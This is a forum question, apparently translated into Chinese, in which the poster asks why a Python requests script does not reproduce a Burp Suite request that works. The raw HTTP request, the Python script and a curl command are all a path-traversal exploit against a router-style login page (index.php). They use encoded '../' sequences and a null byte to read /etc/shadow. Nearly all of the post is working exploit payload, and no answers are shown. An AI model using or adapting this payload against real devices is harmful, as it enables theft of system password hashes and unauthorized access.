0

因此,我正在尝试为基本的 burp 请求编写基本的 python 漏洞利用,但我无法弄清楚。

我的要求是:

POST /index.php HTTP/1.1
Host: <ip>:<port>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://<ip>:<port>/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

USERDBDomains.Domainname=geardomain&USERDBUsers.UserName=&USERDBUsers.Password=&thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm&button.login.USERDBUsers.router_status=button.login.USERDBUsers.router_status%3dLogin&Login.userAgent=

然后我尝试执行以下脚本,但我没有得到与 Burp Suite 相同的输出。

import requests

choice = raw_input("Select your ip: ")
port = raw_input("Select your port: ")

payload = {'USERDBDomains.Domainname' : 'geardomain&USERDBUsers.UserName', 'USERDBUsers.Password' : '', 'thispage' : '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm', 'button.login.USERDBUsers.router_status' : 'button.login.USERDBUsers.router_status%3dLogin', 'Login.userAgent' : ''}
headers = {'POST' : '/index.php HTTP/1.1', 'Host' : '<ip>:<port>', 'Accept' : '*/*', 'Accept-Language' : 'en', 'User-Agent' : 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0', 'Connection' : 'close', 'Referer' : 'https://<ip>:<port>/index.php', 'Content-Type' : 'application/x-www-form-urlencoded', 'Content-Length' : '201'}

url = "https://{}:{}/index.php".format(<ip> , <port>)

r = requests.get(url, params=payload, headers=headers, verify=False)

print r.status_code

print r.headers

print r.content

curl漏洞利用是:

curl -i -s -k  -X $'POST' \
    -H $'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)' -H $'Referer: https://<ip>:<port>/index.php' -H $'Content-Type: application/x-www-form-urlencoded' \
    --data-binary $'USERDBDomains.Domainname=geardomain&USERDBUsers.UserName=&USERDBUsers.Password=&thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow%00index.htm&button.login.USERDBUsers.router_status=button.login.USERDBUsers.router_status%3dLogin&Login.userAgent=' \
    $'https://<ip>:<port>/index.php'
4

0 回答 0